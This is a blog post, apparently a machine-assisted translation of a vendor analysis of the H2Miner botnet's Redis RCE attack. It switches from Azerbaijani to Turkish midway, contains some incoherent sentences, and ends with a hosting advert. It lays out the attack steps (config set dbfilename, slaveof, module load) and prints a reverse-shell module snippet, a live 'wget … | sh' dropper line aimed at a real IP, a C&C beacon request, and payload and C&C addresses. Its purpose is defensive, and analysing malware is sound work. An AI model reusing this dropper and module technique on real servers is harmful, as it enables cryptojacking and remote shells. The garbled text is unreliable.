Redis RCE-ni istismar edən yeni H2Miner viruslarının yayılması aşkar edildi

Bir gün əvvəl layihəmdən biri bu cür bir çətinliklə qarşılaşdı. "Bu nə idi?" sualına cavab axtararkən Alibaba Cloud Security komandası tərəfindən yazılmış gözəl bir məqaləyə rast gəldim. Bu məqaləni Habr-da tapa bilmədim, ona görə də xüsusi olaraq sizlər üçün tərcümə etməyə qərar verdim <3

Giriş

Son vaxtlar Alibaba Cloud təhlükəsizlik komandası H2Miner-in birdən-birə artan aktivliyini aşkar etdi. Bu cür zərərli çayın Redis-də gücsüz parollardan və ya kimlik doğrulama olmamasından istifadə edərək sistemlərinizə giriş əldə etməsi və daha sonra öz zərərli modulu master-slave sinkronizasiyası vasitəsilə kölenizə sinkronizasiya edərək yükləməsi və hücum edilən maşında zərərli əmrləri icra etməsi üçün giriş yaratmasıdır.

Keçmişdə, sistemlərinizə edilən hücumlar əsasən planlaşdırılmış vəzifələr və ya SSH açarları vasitəsilə həyata keçirilirdi ki, bunlar da zərərverici Redis-ə giriş əldə etdikdən sonra sizin maşınınıza yüklənirdi. Xoşbəxtlikdən, bu metod qarşısını almaqda çətinlik çəkir, çünki icazə nəzarəti ilə bağlı problemlər və ya sistemin müxtəlif versiyaları səbəbiylə. Bununla belə, zərərli modulu yükləmək metodu, hücum edənin əmrlərini birbaşa icra edə bilər və ya shell-ə giriş əldə edə bilər, bu da sisteminiz üçün təhlükəlidir.

Böyük sayda serverləri üçün mükəmməl seçim edir. internetdə yerləşən Redis-lərin (təxminən 1 milyon) olması səbəbindən, Alibaba Cloud təhlükəsizlik komandası, istifadəçilərə Redis-ə internetdən giriş icazəsi verməmələrini və parollarının güvənliyini mütəmadi yoxlamalarını tövsiyyə edir, eyni zamanda tez dəfə qırılma riskinin olmadığını təmin etmələrini xatırladır.

H2Miner

H2Miner, Linux əsaslı sistemlər üçün hazırlanmış bir mədənçilik botnetidir, bu, Hadoop yarn-da kimlik doğrulamanın olmaması, Docker və Redis-in uzaqdan icra etmə zəifliyi (RCE) daxil olmaqla bir neçə yolla sisteminizə sızmağa səbəb ola bilər. Botnet zərərli skriptlərin və zərərli proqramların yüklənməsi, hücumun genişləndirilməsi və komanda-nəzarət (C&C) əlaqəsinin saxlanılması ilə işləyir.

Redis RCE

Bu barədə məlumatları Pavel Toporkov 2018-in ZeroNights konfransında paylaşıb. Redis 4.0 versiyasından sonra, xarici modulları yükləmə funksiyasını dəstəkləyir, bu da istifadəçilərə Redis-də müəyyən Redis əmrlərini icra etmək üçün C ilə kompilyasiya olunmuş so fayllarını yükləməyə imkan verir. Bu funksiya faydalı olsa da, master-slave rejimində faylların fullresync rejimində kölé ilə sinkronizasiya edilməsinə səbəb olan bir zəiflik ehtiva edir. Bu, hücumçular tərəfindən zərərli so fayllarının ötürülməsi üçün istifadə oluna bilər. Ötürmə tamamlandıqdan sonra, zərərvericilər zərər çəkmiş Redis nüsxəsinə modulu yükləyir və hər hansı bir əmri icra edirlər.

Zərərli çayın analizi

Son zamanlarda Alibaba Cloud güvenlik ekibi, H2Miner zararlı madenciler grubunun boyutunun ani bir şekilde arttığını keşfetti. Analizlere göre, saldırının oluşma süreci şu şekildedir:

Redis RCE-ni istismar edən yeni H2Miner viruslarının yayılması aşkar edildi

H2Miner, tam ölçekli bir saldırı için RCE Redis kullanmaktadır. Öncelikle, saldırganlar savunmasız Redis sunucularını veya zayıf parolalara sahip sunucuları hedef alır.

Daha sonra, komutunu kullanırlar: config set dbfilename red2.so dosya adını değiştirmek için. Ardından, saldırganlar slaveof komutunu kullanarak master-slave çoğaltma adresini ayarlar.

Saldırıya uğrayan Redis örneği, saldırganın sahip olduğu zararlı Redis ile master-slave bağlantısı kurduğunda, saldırgan, dosyaları senkronize etmek için fullresync komutunu kullanarak bulaşmış modülü gönderir. Sonrasında red2.so dosyası hedef makineye yüklenecektir. Ardından saldırganlar, bu dosyayı yüklemek için .\/red2.so yükleme modülünü kullanır. Modül, saldırganın komutlarını çalıştırabilir veya hedef makineye erişim sağlamak için ters bağlantı (arka kapı) başlatabilir.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Zararlı komut çalıştırıldıktan sonra, öyle ki / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, saldırgan, yedek dosyasının adını sıfırlayacak ve izlerini silmek için sistem modülünü boşaltacaktır. Ancak, red2.so dosyası hala saldırıya uğramış makinede kalacaktır. Kullanıcılara, Redis örneklerinin klasöründe bu şüpheli dosyanın olup olmadığına dikkat etmeleri önerilir.

Bazı zararlı süreçleri yok etmenin yanı sıra, saldırgan, kaynakları çalmak için zararlı senaryoyu izleyip, zararlı dosyaları ikili biçimde indirip çalıştırmıştır. 142.44.191.122\/kinsing. Bu, kinsing içeren bir süreç adı veya dizin adının, bu makinenin bu virüsle enfekte olduğunu gösterebileceği anlamına geliyor.

Ters mühendislik sonuçlarına göre, zararlı yazılım esasen şu işlevleri yerine getirir:

  • Dosyaları indirme ve çalıştırma
  • Madencilik
  • C&C ile bağlantıyı sürdürebilme ve saldırganın komutlarını yerine getirme

Redis RCE-ni istismar edən yeni H2Miner viruslarının yayılması aşkar edildi

Etkilerini genişletmek için dış tarama için masscan kullanın. Ayrıca, C&C sunucusunun IP adresi programda sıkı bir şekilde şifrelenmiştir ve hedef ana bilgisayar, HTTP istekleri aracılığıyla C&C iletişim sunucusu ile etkileşimde bulunacaktır; burada zombilerin (kırılmış sunucu) bilgileri HTTP başlığında tanımlanmaktadır.

Redis RCE-ni istismar edən yeni H2Miner viruslarının yayılması aşkar edildi

GET \/h HTTP\/1.1
Host: 91.215.169.111
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Diğer saldırı yöntemleri

Redis RCE-ni istismar edən yeni H2Miner viruslarının yayılması aşkar edildi

Solucanın kullandığı adresler ve bağlantılar

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Məsləhət

İlk olarak, Redis'in internete açık olmaması ve güvenilir bir şifreyle korunması gerekmektedir. Ayrıca, müşterilerin Redis dizininde red2.so dosyasının olmamasını ve sunucu üzerindeki dosya/proses adında "kinsing" olmamasını kontrol etmeleri önemlidir.

Mənbə: habr.com

DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər 🔥 DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər | ProHoster